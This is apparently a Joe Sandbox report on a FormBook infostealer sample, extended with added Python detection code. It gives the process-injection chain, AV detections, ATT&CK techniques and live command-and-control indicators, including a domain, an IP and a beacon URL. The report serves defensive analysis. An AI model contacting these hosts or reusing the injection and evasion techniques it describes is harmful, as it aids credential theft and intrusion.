            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\New_1007572_021.exe queries volume information (VolumeInformation) for the following font files:
• C:\Windows\Fonts\ERASLGHT.TTF
• C:\Windows\Fonts\ERASDEMI.TTF
• C:\Windows\Fonts\ERASBD.TTF
• C:\Windows\Fonts\ENGR.TTF
• C:\Windows\Fonts\ELEPHNT.TTF
• C:\Windows\Fonts\ELEPHNTI.TTF
• C:\Windows\Fonts\ITCEDSCR.TTF
• C:\Windows\Fonts\CURLZ___.TTF
• C:\Windows\Fonts\COPRGTL.TTF
• C:\Windows\Fonts\COPRGTB.TTF
• C:\Windows\Fonts\CENSCBK.TTF
• C:\Windows\Fonts\SCHLBKI.TTF
• C:\Windows\Fonts\SCHLBKB.TTF
• C:\Windows\Fonts\SCHLBKBI.TTF
• C:\Windows\Fonts\CASTELAR.TTF
• C:\Windows\Fonts\CALIST.TTF
• C:\Windows\Fonts\CALISTI.TTF
• C:\Windows\Fonts\CALISTB.TTF
• C:\Windows\Fonts\CALISTBI.TTF
• C:\Windows\Fonts\BOOKOS.TTF
• C:\Windows\Fonts\BOOKOSB.TTF
• C:\Windows\Fonts\BOOKOSI.TTF
• C:\Windows\Fonts\BOOKOSBI.TTF
• C:\Windows\Fonts\BOD_R.TTF
• C:\Windows\Fonts\BOD_I.TTF
• C:\Windows\Fonts\BOD_B.TTF
• C:\Windows\Fonts\BOD_BI.TTF
• C:\Windows\Fonts\BOD_CR.TTF
• C:\Windows\Fonts\BOD_BLAR.TTF
• C:\Windows\Fonts\BOD_CI.TTF
• C:\Windows\Fonts\BOD_CB.TTF
• C:\Windows\Fonts\BOD_BLAI.TTF
• C:\Windows\Fonts\BOD_CBI.TTF
• C:\Windows\Fonts\ITCBLKAD.TTF
• C:\Windows\Fonts\ARLRDBD.TTF
• C:\Windows\Fonts\AGENCYR.TTF
• C:\Windows\Fonts\AGENCYB.TTF
• C:\Windows\Fonts\BSSYM7.TTF
• C:\Windows\Fonts\REFSAN.TTF
• C:\Windows\Fonts\REFSPCL.TTF
• C:\Windows\Fonts\MTEXTRA.TTF
• C:\Windows\Fonts\marlett.ttf
• C:\Windows\Fonts\micross.ttf
Source: C:\Users\user\Desktop\New_1007572_021.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 0.2.New_1007572_021.exe.3eb8b30.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.FB_5E87.tmp.exe.1080000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.New_1007572_021.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.New_1007572_021.exe.3bc9930.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.New_1007572_021.exe.3d7bea0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.New_1007572_021.exe.3d06480.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.740535210.0000000000404000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.739038576.0000000003BCD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, type: DROPPED

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | the same 21 file sources (7 unpacked PE files, 13 memory dumps and the dropped file C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe) as listed under "Stealing of Sensitive Information" above.

Mitre Att&ck Matrix

Bracketed digits are the superscript counts from the original matrix, kept as extracted; cells without digits are the unfilled matrix template.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules [1] | Path Interception | Process Injection [712] | Rootkit [1] | Credential API Hooking [1] | Security Software Discovery [221] | Remote Services | Credential API Hooking [1] | Exfiltration Over Other Network Medium | Encrypted Channel [1] | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading [1] | Input Capture [1] | Process Discovery [2] | Remote Desktop Protocol | Input Capture [1] | Exfiltration Over Bluetooth | Ingress Tool Transfer [1] | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools [1] | Security Account Manager | Virtualization/Sandbox Evasion [31] | SMB/Windows Admin Shares | Archive Collected Data [1] | Automated Exfiltration | Non-Application Layer Protocol [2] | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion [31] | NTDS | Remote System Discovery [1] | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol [12] | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection [712] | LSA Secrets | File and Directory Discovery [1] | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information [1] | Cached Domain Credentials | System Information Discovery [112] | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information [4] | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing [13] | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Timestomp [1] | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

            Behavior Graph

Behavior Graph ID: 458848 | Sample: New_1007572_021.exe | Start date: 03/08/2021 | Architecture: WINDOWS | Score: 100

Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 5 other signatures

Process tree recovered from the graph:

• New_1007572_021.exe (started)
  Dropped: C:\Users\user\AppData\...\New_1007572_021.exe (PE32); C:\...\New_1007572_021.exe:Zone.Identifier (ASCII); C:\Users\user\...\New_1007572_021.exe.log (ASCII)
  Signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
  • New_1007572_021.exe (second instance, started by the first)
    Network: 192.168.2.1 (unknown, unknown)
    Dropped: C:\Users\user\AppData\...\FB_5E87.tmp.exe (PE32); C:\Users\user\AppData\...\FB_5908.tmp.exe (PE32)
    Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
    • FB_5E87.tmp.exe (started)
      Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 5 other signatures
      • explorer.exe (injected)
        Network: www.comfsresidential.com 185.53.178.50, 49760, 80, TEAMINTERNET-ASDE, Germany
        Signatures: System process connects to network (likely due to code injection or exploit)
        • cscript.exe (started)
          Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          • cmd.exe (started)
            • conhost.exe (started)
    • FB_5908.tmp.exe (started)
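The chain in the graph (the sample re-launching itself, the FB_*.tmp.exe drops in the user's Temp folder, and the injected explorer.exe launching cscript.exe which in turn launches cmd.exe) is the part a detection engineer would want to alert on. The block below is an added example, not part of the Joe Sandbox report: it runs a few process-tree checks over a small set of constructed Sysmon-style process-creation events modelled on this graph. The PIDs, the event fields, the rule names and the set of script hosts checked beyond cscript.exe are assumptions.

```python
"""Process-tree checks for the injection chain shown in the behaviour graph.

Added example, not part of the Joe Sandbox report. Event format and PIDs are
assumptions (Sysmon-style fields, made-up PIDs).
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str         # full path of the new process
    parent_image: str  # full path of the parent process


SAMPLE = r"C:\Users\user\Desktop\New_1007572_021.exe"
TEMP = r"C:\Users\user\AppData\Local\Temp"
SYS32 = r"C:\Windows\System32"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed events modelled on the report's behaviour graph; PIDs are made up.
EVENTS = [
    ProcEvent(100, 1, SAMPLE, EXPLORER),                   # user launches the sample
    ProcEvent(101, 100, SAMPLE, SAMPLE),                   # sample re-launches itself (hollowed copy)
    ProcEvent(102, 101, TEMP + r"\FB_5E87.tmp.exe", SAMPLE),
    ProcEvent(103, 101, TEMP + r"\FB_5908.tmp.exe", SAMPLE),
    ProcEvent(104, 1, SYS32 + r"\cscript.exe", EXPLORER),  # injected explorer.exe spawns cscript.exe
    ProcEvent(105, 104, SYS32 + r"\cmd.exe", SYS32 + r"\cscript.exe"),
    ProcEvent(106, 105, SYS32 + r"\conhost.exe", SYS32 + r"\cmd.exe"),
    ProcEvent(200, 1, r"C:\Program Files\Google\Chrome\Application\chrome.exe", EXPLORER),  # benign noise
]

# The report shows cscript.exe; the other hosts are an assumption about what an
# injected explorer.exe may launch instead, and should be tuned per environment.
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe", "mshta.exe", "powershell.exe"}

# Any executable run directly from the user's Temp folder (matches FB_*.tmp.exe).
TEMP_EXE = re.compile(r"\\AppData\\Local\\Temp\\[^\\]+\.exe$", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyse(events):
    """Return {rule_name: set(pids)} for the events that trip each rule."""
    by_pid = {e.pid: e for e in events}
    findings = {}

    def hit(rule, pid):
        findings.setdefault(rule, set()).add(pid)

    for e in events:
        # A process spawning a second copy of its own image is the classic
        # setup for hollowing the child (the report: "Injects a PE file ...").
        if e.image.lower() == e.parent_image.lower():
            hit("self_spawn_possible_hollowing", e.pid)
        if TEMP_EXE.search(e.image):
            hit("exe_launched_from_user_temp", e.pid)
        if basename(e.parent_image) == "explorer.exe" and basename(e.image) in SCRIPT_HOSTS:
            hit("explorer_spawns_script_host", e.pid)
        parent = by_pid.get(e.ppid)
        if (parent is not None and basename(e.image) == "cmd.exe"
                and basename(parent.image) in SCRIPT_HOSTS
                and basename(parent.parent_image) == "explorer.exe"):
            hit("explorer_script_host_cmd_chain", e.pid)
    return findings


def lineage(events, pid):
    """Ancestor chain of `pid` as image basenames, root first."""
    by_pid = {e.pid: e for e in events}
    if pid not in by_pid:
        return []
    chain = []
    e = by_pid[pid]
    while True:
        chain.append(basename(e.image))
        parent = by_pid.get(e.ppid)
        if parent is None:
            chain.append(basename(e.parent_image))  # root known only by name
            break
        e = parent
    return list(reversed(chain))


if __name__ == "__main__":
    for rule, pids in sorted(analyse(EVENTS).items()):
        for pid in sorted(pids):
            print(f"{rule}: pid {pid}: {' -> '.join(lineage(EVENTS, pid))}")
```

On real telemetry the self-spawn rule needs an allow-list (updaters and browsers legitimately spawn themselves), and the Temp rule is noisy on installers; the explorer.exe to script host to cmd.exe chain is the most specific of the four for this family's behaviour.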


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

Source | Detection | Scanner | Label
New_1007572_021.exe | 28% | ReversingLabs | ByteCode-MSIL.Spyware.Noon
New_1007572_021.exe | 100% | Joe Sandbox ML |

            Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | 100% | Avira | TR/Crypt.ZPACK.Gen
C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\New_1007572_021.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe | 5% | Metadefender |
C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe | 2% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | 49% | Metadefender |
C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | 86% | ReversingLabs | Win32.Trojan.FormBook
C:\Users\user\AppData\Local\Temp\New_1007572_021.exe | 28% | ReversingLabs | ByteCode-MSIL.Spyware.Noon

            Unpacked PE Files

Source | Detection | Scanner | Label
0.2.New_1007572_021.exe.2d49d5c.1.unpack | 100% | Avira | TR/Dropper.Gen
0.2.New_1007572_021.exe.3eb8b30.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2
10.2.FB_5E87.tmp.exe.1080000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
10.1.FB_5E87.tmp.exe.1080000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
10.0.FB_5E87.tmp.exe.1080000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
8.2.New_1007572_021.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
0.2.New_1007572_021.exe.3bc9930.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

            Domains

            No Antivirus matches

            URLs

Source | Detection | Scanner | Label
http://www.fontbureau.comF | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.fontbureau.comiona | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.fontbureau.come.comE | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.comfsresidential.com/cg53/?y48=RnXd-dV8&04VdoL_=jL4gYOGdbdGLgCuh81HWgUyhq6g08d9KQ1n+auYX12/KRBTZXwpphFOeP1KBAJVgFN6h | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe

            Domains and IPs

            Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.comfsresidential.com | 185.53.178.50 | true | true | | unknown

              Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.comfsresidential.com/cg53/?y48=RnXd-dV8&04VdoL_=jL4gYOGdbdGLgCuh81HWgUyhq6g08d9KQ1n+auYX12/KRBTZXwpphFOeP1KBAJVgFN6h | true | Avira URL Cloud: safe | unknown

              URLs from Memory and Binaries

Source keys used in the table:
• A = New_1007572_021.exe, 00000000.00000002.742817796.0000000005BA0000.00000002.00000001.sdmp
• B = explorer.exe, 0000000B.00000000.774582280.000000000B970000.00000002.00000001.sdmp
• C = New_1007572_021.exe, 00000000.00000002.738485693.00000000012F7000.00000004.00000040.sdmp
• D = explorer.exe, 0000000B.00000000.785548112.0000000002B50000.00000002.00000001.sdmp

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | A, B | false | | high
http://www.fontbureau.com | A, B | false | | high
http://www.fontbureau.com/designersG | A, B | false | | high
http://www.fontbureau.comF | C | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/? | A, B | false | | high
http://www.founder.com.cn/cn/bThe | A, B | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | A, B | false | | high
http://www.tiro.com | B | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | B | false | | high
http://www.goodfont.co.kr | A, B | false | URL Reputation: safe | unknown
http://www.fontbureau.comiona | C | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | A, B | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | A, B | false | URL Reputation: safe | unknown
http://www.typography.netD | A, B | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | A, B | false | | high
http://www.founder.com.cn/cn/cThe | A, B | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | A, B | false | URL Reputation: safe | unknown
http://fontfabrik.com | A, B | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | A, B | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | A, B | false | | high
http://www.fontbureau.come.comE | C | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/ | A, B | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | A, B | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | A, B | false | | high
http://www.%s.comPA | D | false | URL Reputation: safe | low
http://www.fonts.com | A, B | false | | high
http://www.sandoll.co.kr | A, B | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | A, B | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | A, B | false | URL Reputation: safe | unknown
http://www.sakkal.com | A, B | false | URL Reputation: safe | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
185.53.178.50 | www.comfsresidential.com | Germany | 61969 | TEAMINTERNET-ASDE | true

Private

IP
192.168.2.1
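The domain, IP and URL above are the network indicators a responder would push against proxy logs. The block below is an added example, not from the report: it matches those indicators against a few constructed proxy log lines and also applies a looser check for the URI shape seen in the contacted URL (a four-character path segment followed by two short query parameters carrying encoded values). That shape check is an assumption generalised from the single URL in this report, and the log format and log lines are constructed.

```python
"""Match this report's network indicators against proxy log lines.

Added example, not part of the Joe Sandbox report. The log format is
constructed; the URI-shape heuristic is generalised from one observed URL.
"""
import re
from urllib.parse import urlsplit

# Indicators copied from the report's Contacted Domains / URLs / IPs.
C2_URL = ("http://www.comfsresidential.com/cg53/?y48=RnXd-dV8"
          "&04VdoL_=jL4gYOGdbdGLgCuh81HWgUyhq6g08d9KQ1n+auYX12/KRBTZXwpphFOeP1KBAJVgFN6h")
C2_URLS = {C2_URL}
C2_DOMAINS = {"www.comfsresidential.com"}
C2_IPS = {"185.53.178.50"}

# Assumption: shape of the observed C2 URI. Four alphanumeric path characters,
# exactly two short parameter names, encoded values (the second one long).
URI_PATH = re.compile(r"^/[A-Za-z0-9]{4}/$")
PARAM_NAME = re.compile(r"[A-Za-z0-9_]{2,8}")
VALUE_CHARS = re.compile(r"[A-Za-z0-9+/=_-]+")


def looks_like_c2_uri(url: str) -> bool:
    """Heuristic match on URI shape; a hit without an exact IOC is a lead, not proof."""
    parts = urlsplit(url)
    if not URI_PATH.match(parts.path) or not parts.query:
        return False
    params = parts.query.split("&")  # split by hand: parse_qsl would turn '+' into a space
    if len(params) != 2:
        return False
    names, values = zip(*(p.partition("=")[::2] for p in params))
    return (all(PARAM_NAME.fullmatch(n) for n in names)
            and all(VALUE_CHARS.fullmatch(v) for v in values)
            and len(values[0]) >= 6 and len(values[1]) >= 32)


def scan(log_text: str):
    """Return one hit per log line that matches an exact IOC or the URI heuristic.

    Constructed line format: '<timestamp> <client> <method> <url> <status>'.
    """
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        fields = line.split()
        if len(fields) != 5:
            continue  # malformed or blank line
        _ts, client, _method, url, _status = fields
        host = (urlsplit(url).hostname or "").lower()
        reasons = []
        if url in C2_URLS:
            reasons.append("url")
        if host in C2_DOMAINS:
            reasons.append("domain")
        if host in C2_IPS:
            reasons.append("ip")
        if looks_like_c2_uri(url):
            reasons.append("uri_pattern")
        if reasons:
            hits.append({"line": n, "client": client, "host": host, "reasons": sorted(reasons)})
    return hits


# Constructed sample log: one exact C2 hit, a font-vendor URL from the same
# report (benign), a POST to the C2 path, a pattern-only hit on the C2 IP, noise.
SAMPLE_LOG = "\n".join([
    "2021-08-03T19:50:12Z 192.168.2.15 GET " + C2_URL + " 200",
    "2021-08-03T19:50:13Z 192.168.2.15 GET http://www.fontbureau.com/designers 200",
    "2021-08-03T19:51:02Z 192.168.2.15 POST http://www.comfsresidential.com/cg53/ 200",
    "2021-08-03T19:52:40Z 192.168.2.16 GET http://185.53.178.50/ab12/?q1=AbCdEf"
    "&zz=Z2VuZXJpYy1jb25zdHJ1Y3RlZC1zYW1wbGUtdmFsdWU 404",
    "2021-08-03T19:53:00Z 192.168.2.17 GET http://example.org/index.html 200",
])

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f"line {h['line']}: {h['client']} -> {h['host']} [{', '.join(h['reasons'])}]")
```

Exact domain, IP and URL matches are the ones to act on; the uri_pattern reason on its own should be reviewed against the full request (user agent, the process that made it, and whether the host also resolves to known bad infrastructure) before it is treated as a confirmed beacon.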

                                  General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 458848
Start date: 03.08.2021
Start time: 19:47:24
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 32s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: New_1007572_021.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@11/5@1/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 61.7% (good quality ratio 54.7%)
• Quality average: 69.1%
• Quality standard deviation: 33.6%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .exe
                                  Warnings:
                                  Show All
                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                  • Excluded IPs from analysis (whitelisted): 52.114.77.33, 104.43.139.144, 104.43.193.48, 23.211.6.115, 40.88.32.150, 20.50.102.62, 20.54.110.249, 173.222.108.226, 173.222.108.210, 40.112.88.60, 80.67.82.235, 80.67.82.211, 20.82.210.154
                                  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, browser.events.data.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, skypedataprdcolneu04.cloudapp.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, browser.pipe.aria.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: /opt/package/joesandbox/database/analysis/458848/sample/New_1007572_021.exe

                                  Simulations

                                  Behavior and APIs

                                  No simulations

                                  Joe Sandbox View / Context

                                  IPs

Match | Associated Sample Name / URL | Detection | Context
185.53.178.50 | http://wwww.fgoogle.at | malicious | wwww.fgoogle.at/favicon.ico

                                  Domains

                                  No context

                                  ASN

Match | Associated Sample Name / URL | Detection | Context
TEAMINTERNET-ASDE | rL3Wx4zKD4.exe | malicious | 185.53.177.53
 | Medical Equipment Order 2021.PDF.exe | malicious | 185.53.179.90
 | d9UdQnXQ86ld31G.exe | malicious | 185.53.177.11
 | YKqDUg3NxSA9bwZ.exe | malicious | 185.53.178.11
 | dl145cKtrs.exe | malicious | 185.53.178.12
 | PO 3457773.exe | malicious | 185.53.177.14
 | PO#JFUB0002 FOR NEW ORDER.exe | malicious | 185.53.177.53
 | Confirma PI#4042021 INVOICE.exe | malicious | 185.53.177.53
 | RFQ-2176 NEW PROJECT QUOTATION MAY.exe | malicious | 185.53.177.11
 | WXs8v9QuE7.exe | malicious | 185.53.177.12
 | KBzeB23bE1.exe | malicious | 185.53.177.13
 | xnuE49NGol.exe | malicious | 185.53.177.11
 | aVzUZCHkko.exe | malicious | 185.53.177.11
 | PO#310521.PDF.exe | malicious | 185.53.178.10
 | Scanned Specification Catalogue 7464.exe | malicious | 185.53.177.52
 | Ciikfddtznhxmtqufdujkifxwmwhrfjkcl_Signed_.exe | malicious | 185.53.178.53
 | $RAULIU9.exe | malicious | 185.53.177.31
